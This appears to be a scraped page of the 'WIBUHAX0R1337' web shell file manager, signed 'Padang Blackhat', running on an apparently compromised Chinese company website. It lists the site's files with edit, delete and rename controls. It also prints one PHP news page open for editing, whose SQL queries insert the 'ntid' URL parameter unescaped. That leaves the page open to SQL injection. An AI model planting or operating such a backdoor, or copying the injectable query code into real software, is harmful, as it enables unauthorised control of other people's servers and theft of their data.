-
WIBUHAX0R1337
-
/
home
/
zqegovsj
/
www
/
us3web.haibo.com.cn
/
lhipsz
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.well-known
--
NONE
cgi-bin
--
NONE
css
--
NONE
flag
--
NONE
fonts
--
NONE
image
--
NONE
images
--
NONE
img
--
NONE
js
--
NONE
pic
--
NONE
.htaccess
1.994KB
Edit File
Delete File
Rename
404.php
0.39KB
Edit File
Delete File
Rename
a_feedback.php
1.789KB
Edit File
Delete File
Rename
about.php
8.18KB
Edit File
Delete File
Rename
areas.php
4.098KB
Edit File
Delete File
Rename
closelabel.gif
0.956KB
Edit File
Delete File
Rename
contact.php
2.701KB
Edit File
Delete File
Rename
download.php
1.481KB
Edit File
Delete File
Rename
err.html
0.282KB
Edit File
Delete File
Rename
head.php
4.414KB
Edit File
Delete File
Rename
index.php
17.112KB
Edit File
Delete File
Rename
lang.php
5.411KB
Edit File
Delete File
Rename
message.php
3.38KB
Edit File
Delete File
Rename
new_section.php
2.467KB
Edit File
Delete File
Rename
news-index.php
3.009KB
Edit File
Delete File
Rename
news.php
2.74KB
Edit File
Delete File
Rename
news2.php
3.608KB
Edit File
Delete File
Rename
oeuonxsj.php
0.742KB
Edit File
Delete File
Rename
page-index.php
21.736KB
Edit File
Delete File
Rename
product.php
2.688KB
Edit File
Delete File
Rename
product2.php
5.269KB
Edit File
Delete File
Rename
product_index.php
5.883KB
Edit File
Delete File
Rename
professionals.php
7.188KB
Edit File
Delete File
Rename
robots.txt
1.105KB
Edit File
Delete File
Rename
search.php
2.423KB
Edit File
Delete File
Rename
search2.php
1.772KB
Edit File
Delete File
Rename
sectioncontent.php
1.918KB
Edit File
Delete File
Rename
service.php
10.86KB
Edit File
Delete File
Rename
session.php
0.15KB
Edit File
Delete File
Rename
site_map.php
3.798KB
Edit File
Delete File
Rename
tag.php
0.838KB
Edit File
Delete File
Rename
txets.php
5.487KB
Edit File
Delete File
Rename
webexc.html
0.136KB
Edit File
Delete File
Rename
webexc.php
0.427KB
Edit File
Delete File
Rename
xml.php
2.623KB
Edit File
Delete File
Rename
<?php include("function.php"); $sql = "select count(id) from ".$noe_version."_companynewses where member_id='".$id."' and type_id =".$_GET['ntid']; $num = $db->selectarray($sql); $num = $db->toarray($num); $pagecount=$num[0][0]; $page_num=18; if($pagecount==0)$pagecount=1; if($_GET['page']!='')$st=$_GET['page']-1; if(!isset($st))$st=0; if($_COOKIE['creathtml']>0){ $pages = $db->build_pagelinks(array( 'TOTAL_POSS' => $num[0][0], 'PER_PAGE' => $page_num, 'CUR_ST' => $st, 'BASE_URL' => "news_sid_".$_GET['ntid'] ) );}else{ $pages = $db->build_pagelinks(array( 'TOTAL_POSS' => $num[0][0], 'PER_PAGE' => $page_num, 'CUR_ST' => $st, 'BASE_URL' => $db->turn_name($_GET['make_s']).'_newstype'.$_GET['ntid'] ) );} $number=$st*$page_num+1; $number2=$st*$page_num+$page_num; $sql = "select id,title,created,content,picture,title2 from ".$noe_version."_companynewses where member_id='".$id."' and type_id =".$_GET['ntid']." order by created desc LIMIT ".$st*$page_num.','.$page_num; $res=$db->selectarray($sql); $news=$res; $sql="select id,name,name2 from ".$noe_version."_newstypes where id='".$_GET['ntid']."'"; $res=$db->selectarray($sql); $res=$db->toarray($res); $aa='news.html'; $aaa=$lang['words'][73]; $bb=$db->turn_name($res[0][2]).'_newstype'.$res[0][0].'.html'; $bbb=$res[0][1]; $purl=$bb; $fb=$_GET['sort_id']; $sql = "select name,keyword,des from ".$noe_version."_newstypes where id =".$_GET['ntid']; $result=$db->selectone($sql); $pagekeyword=$result['name']; $pagekeyword2=$result['name'].', '.$result['keyword']; $pagekeyword3=$result['des']; $pagekeyword4=$result['des']; include("head.php"); ?> <div class="boss_article-item boss_article-detail"> <div class="content_bg"> <h1 class="article-title-boss"><? if($_GET['ntid']==''){?><?=$lang['words'][73]?><? }else{?><?=$newstype[0][1]?><? }?></h1> <div class="row"><? $i=1; while(@$b=mysqli_fetch_row($news)){ ?> <article class="event-post col-md-6 bottom_offset_2"> <!--Box--> <div class="box-md"> <div class="box_left"> <? if ($b[4]!="") {?> <div><a href="<?=$db->turn_name($b[5])?>_newsview<?=$b[0]?>.html"> <img src="https://<?=$imgweb?>/upload/big/<?=$b[4]?>" alt="<?=$b[1]?>" title="<?=$b[1]?>"></a> </div> <? }?> <time datetime="<?=date("y",$b[2])?>-<?=date("m",$b[2])?>-<?=date("d",$b[2])?>" class="heading-2"><span><?=date("d",$b[2])?></span> <?=date("M",$b[2])?> / <?=date("Y",$b[2])?></time> </div> <div class="box_cnt"> <h2><a href="<?=$db->turn_name($b[5])?>_newsview<?=$b[0]?>.html"><?=$b[1]?></a></h2> <p><?=$db->mystrcut(html_entity_decode($b[3]),100)?>...</p> <a href="<?=$db->turn_name($b[5])?>_newsview<?=$b[0]?>.html" class="btn" data-text="<?=$lang['words'][153]?>"> <?=$lang['words'][153]?> </a> </div> </div> <!--END box--> </article><? $i++;?> <? }?> <? if($pagecount>12){?> <? include("page_navigation.php");?> <? }?> </div> </div> </div> <? include("foot.php");?>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat